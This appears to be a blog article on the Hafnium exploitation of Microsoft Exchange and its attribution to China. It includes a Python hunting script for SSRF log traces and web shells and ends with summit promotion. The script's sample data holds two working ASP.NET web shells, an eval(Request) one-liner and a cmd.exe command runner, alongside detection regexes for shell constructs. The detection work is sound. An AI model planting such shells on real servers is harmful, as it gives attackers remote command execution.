The European Union, Australia, New Zealand, and Japan, together with other allied governments, have jointly and publicly attributed the recent mass exploitation of Microsoft Exchange servers, which hit organizations across continents, to Chinese state-sponsored actors, presenting the coordinated statement as a united front against the global threat of Chinese state-backed cyberattacks.
Hafnium, the name Microsoft gave the group behind the intrusions, was a previously little-known Chinese espionage actor: a state-sponsored advanced persistent threat (APT) group that obscured its origin by operating from leased virtual private servers (VPS) located in the US. Volexity, which reported the exploitation, believes the attacks started as early as January 6, 2021. The initial foothold was a zero-day server-side request forgery (SSRF) vulnerability in Microsoft Exchange (CVE-2021-26855), which let an unauthenticated attacker send requests that the Exchange front end treated as coming from the server itself; it was chained with further post-authentication flaws to write files, including web shells, to disk.
Acknowledging that nation-state actors move quickly to exploit any unpatched system, Microsoft released out-of-band updates for the flaws Hafnium exploited and urged customers to apply them as soon as possible, given their critical severity rating. In Microsoft's words, "Promptly applying today's patches is the best protection against this attack."
Microsoft also issued an update for Exchange Server 2010 "for defense-in-depth purposes," published detailed guidance on how the attackers exploited the vulnerabilities and targeted customers, and walked Exchange administrators through the steps needed to secure their environments.
As for how the attack unfolded, Microsoft's security researchers said the attackers gained access to an Exchange server either through the bugs or with stolen credentials, then planted a web shell to take control of the system and run commands remotely. Web shells are small scripts that provide a basic interface for remote access to a compromised system.
Web shells are increasingly common in both commodity and targeted attacks, which makes the trend worth monitoring and investigating continuously. Digital transformation has pushed us into a digital economy, and that economy is more exposed to cyberattacks than ever. Microsoft reported that it saw nearly twice as many web shell attacks between August 2020 and January 2021 as in the same period a year earlier.
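The two footprints described above, the SSRF requests that route through the Exchange front end and the web shells dropped afterwards, are what an incident responder actually hunts for. The following is an added example, not code from the original article or from Microsoft: a small Python hunt that (1) parses a constructed, simplified excerpt of an Exchange HttpProxy log and flags rows whose `AnchorMailbox` or `BackEndCookie` carry the server-routing pattern that Microsoft's published hunting query for CVE-2021-26855 looks for, and (2) scores a set of constructed file contents for web-shell traits, combining location (a server-side script in `aspnet_client`, which should only hold static client assets) with code constructs typical of ASP.NET shells. The log columns, file names and file contents are constructed for the example; real HttpProxy logs carry many more columns and live under `%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\HttpProxy`.

```python
import csv
import re
from fnmatch import fnmatchcase

# --- 1. HttpProxy log hunt ----------------------------------------------------
# Constructed, simplified HttpProxy log excerpt (real logs have many more columns).
# Row 3 mimics the SSRF footprint: no authenticated user, and an AnchorMailbox of
# the form "ServerInfo~host/path" that makes the front end proxy the request to
# a back-end endpoint on the attacker's behalf.
SAMPLE_HTTPPROXY_LOG = """\
#Software: Microsoft Exchange Server
#Fields: DateTime,AuthenticatedUser,UrlStem,AnchorMailbox,BackEndCookie,ClientIpAddress
2021-03-03T01:12:05.011Z,corp\\alice,/owa/,SMTP:alice@corp.example,Server~e4f2a1c0@corp.example~1936,10.0.0.21
2021-03-03T01:12:09.442Z,corp\\bob,/ecp/,SMTP:bob@corp.example,,10.0.0.22
2021-03-03T01:13:40.890Z,,/owa/auth/x.js,ServerInfo~localhost/autodiscover/autodiscover.xml?#,Server~localhost/autodiscover/autodiscover.xml~1936,203.0.113.7
"""


def parse_httpproxy_log(text):
    """Yield one dict per request row, taking column names from the '#Fields:' line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
        elif line and not line.startswith("#"):
            if fields is None:
                raise ValueError("data row before #Fields header")
            yield dict(zip(fields, next(csv.reader([line]))))


def find_ssrf_indicators(text):
    """Return rows whose AnchorMailbox/BackEndCookie show the server-routing SSRF pattern."""
    return [
        row for row in parse_httpproxy_log(text)
        if fnmatchcase(row.get("AnchorMailbox", ""), "ServerInfo~*/*")
        or fnmatchcase(row.get("BackEndCookie", ""), "Server~*/*~*")
    ]


# --- 2. Web shell file hunt ---------------------------------------------------
# aspnet_client serves static client-side assets; no server-side script belongs there.
STATIC_ONLY_DIRS = ("c:/inetpub/wwwroot/aspnet_client/",)
SERVER_SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx")

# Constructs common to ASP.NET web shells: one-line JScript eval shells,
# China Chopper style Request.Item shells, and command-runner shells.
SUSPICIOUS_CODE = [
    re.compile(r"eval\s*\(\s*Request", re.I),
    re.compile(r"Request\.Item\s*\[", re.I),
    re.compile(r"Process\.Start\s*\(", re.I),
    re.compile(r"Assembly\.Load", re.I),
    re.compile(r"cmd\.exe", re.I),
]


def webshell_reasons(path, content):
    """Return the reasons a file looks like a web shell (empty list if none)."""
    norm = path.replace("\\", "/").lower()
    reasons = []
    if norm.endswith(SERVER_SCRIPT_EXTS) and norm.startswith(STATIC_ONLY_DIRS):
        reasons.append("server-side script in a static-only directory")
    for pat in SUSPICIOUS_CODE:
        if pat.search(content):
            reasons.append(f"suspicious code: {pat.pattern}")
    return reasons


def find_webshell_candidates(files):
    """Map path -> reasons for every file in {path: content} that deserves triage."""
    candidates = {}
    for path, content in files.items():
        reasons = webshell_reasons(path, content)
        if reasons:
            candidates[path] = reasons
    return candidates


# Constructed sample contents: a one-line JScript eval shell of the kind reported in
# the Hafnium intrusions, a command-runner shell, a benign sign-in page, a text file.
SAMPLE_FILES = {
    r"C:\inetpub\wwwroot\aspnet_client\system_web\help.aspx":
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\x.aspx":
        '<%@ Page Language="C#" %>'
        '<% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["c"]); %>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page Language="C#" %><html><body>Outlook sign-in form</body></html>',
    r"C:\inetpub\wwwroot\aspnet_client\system_web\readme.txt": "static client assets",
}

if __name__ == "__main__":
    for row in find_ssrf_indicators(SAMPLE_HTTPPROXY_LOG):
        print("SSRF indicator:", row["DateTime"], row["ClientIpAddress"], row["AnchorMailbox"])
    for path, reasons in find_webshell_candidates(SAMPLE_FILES).items():
        print("Web shell candidate:", path, "->", "; ".join(reasons))
```

Both hunts produce leads, not verdicts: a flagged log row should be pivoted on (client IP, time window, files created shortly after), and a flagged file should be compared against a known-good Exchange installation before it is treated as a shell. Note that location alone never flags files under `owa\auth`, which legitimately contains `.aspx` pages; there the decision rests on content.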
This coalition, which spans NATO members and partner nations in the Pacific, is a model for confronting transnational threats that are growing fast. From global companies to government organizations, it is time to make well-informed cybersecurity choices and to design future systems we can trust. Critical infrastructure operators adopting new technologies are especially exposed to a host of new cyber threats: while the growing connectedness of IT and operational physical processes improves productivity, it also opens those processes to security risks that many operators are ill-prepared to combat.
Many manufacturers are adopting a zero-trust security approach for critical industrial control system (ICS) environments to reduce risk and strengthen protection beyond what compliance alone requires. Zero trust means continuously verifying people, devices, systems, and networks before they are allowed to interact, rather than trusting anything by default because of where it sits on the network, so that a single compromised component cannot quietly reach the rest.
Security firm Armis surveyed more than 2,000 respondents across the US and found that end users are paying little attention to the major cyberattacks hitting operational technology (OT) and critical infrastructure across the country. As systems become more autonomous and more digital, OT administrators cannot be left behind: they need to understand what security controls will bring to their environment and how those controls will make their jobs easier. Security cannot move forward without taking the people along.
The Microsoft incident, and others like the Kaseya attack, should be warning enough to keep servers up to date and to prepare both systems and people for future cyberattacks. Here is how you can begin your cybersecurity journey.
Quick Tips
- Educate your customers and employees about cyber hygiene and the importance of applying updates. Training is key.
- Develop enterprise risk management policies that incorporate cybersecurity.
- Prioritize robust network and host-based monitoring.
- Implement backups based on business value and operational needs, and watch for backup failures and inconsistencies.
- Conduct a thorough assessment of your company's current IT environment and security controls.
- Mandate regular audits of access to systems and networks.
- Apply security patches promptly, enforce strong passwords and multifactor authentication, and back up your data.
- Prepare for cyberattacks with law enforcement contacts and security experts in your corner, and develop and test recovery plans regularly.
- Make sure teams work together rather than in silos.
Want to learn more about how you can help your employees build critical cybersecurity skills? Join the Cyber Security for Critical Assets Summit Europe, which brings together hundreds of IT and OT security leaders from the Energy, Oil and Gas industries.
Take a look at our Agenda and book your seat for FREE for 12th & 13th October 2021 with the Discount code: MYVIP

